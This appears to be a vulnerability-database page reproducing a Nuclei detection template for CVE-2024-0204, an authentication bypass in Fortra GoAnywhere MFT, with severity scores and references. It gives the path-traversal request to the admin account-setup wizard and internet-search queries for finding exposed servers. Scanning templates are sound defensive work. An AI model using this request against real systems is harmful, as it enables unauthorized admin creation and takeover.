Fortra GoAnywhere MFT - Authentication Bypass

2024-01-2321:05:52

ProjectDiscovery

github.com

fortra

goanywhere_managed_file_transfer

authentication_bypass

unauthorized_user

admin_user_creation

CVSS3

9.8

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

AI Score

9.4

Confidence

High

EPSS

0.584

Percentile

97.8%

JSON

Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.

id: CVE-2024-0204

info:
  name: Fortra GoAnywhere MFT - Authentication Bypass
  author: DhiyaneshDK
  severity: critical
  description: |
    Authentication bypass in Fortra's GoAnywhere MFT prior to 7.4.1 allows an unauthorized user to create an admin user via the administration portal.
  reference:
    - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml
    - https://www.fortra.com/security/advisory/fi-2024-001
    - https://github.com/horizon3ai/CVE-2024-0204/blob/main/CVE-2024-0204.py
    - https://www.horizon3.ai/cve-2024-0204-fortra-goanywhere-mft-authentication-bypass-deep-dive/
    - http://packetstormsecurity.com/files/176683/GoAnywhere-MFT-Authentication-Bypass.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-0204
    cwe-id: CWE-425
    epss-score: 0.50096
    epss-percentile: 0.97519
    cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: fortra
    product: goanywhere_managed_file_transfer
    shodan-query:
      - http.favicon.hash:1484947000,1828756398,1170495932
      - http.favicon.hash:1484947000
    fofa-query:
      - app="GoAnywhere-MFT"
      - icon_hash=1484947000
      - icon_hash=1484947000,1828756398,1170495932
      - app="goanywhere-mft"
    zoomeye-query:
      - app:"Fortra GoAnywhere-MFT"
      - app:"fortra goanywhere-mft"
  tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra

http:
  - method: GET
    path:
      - "{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Create an administrator account"
          - "goanywhere"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100aad72bb1daab1487638c2abf02e13adfb741ae7eed198c48c07e7f95c1968d06022072f7c69ebf26c71a1544dfc0d7e99b6051fc40e09615eb30904343822615b1a7:922c64590222798bb761d5b6d8e72950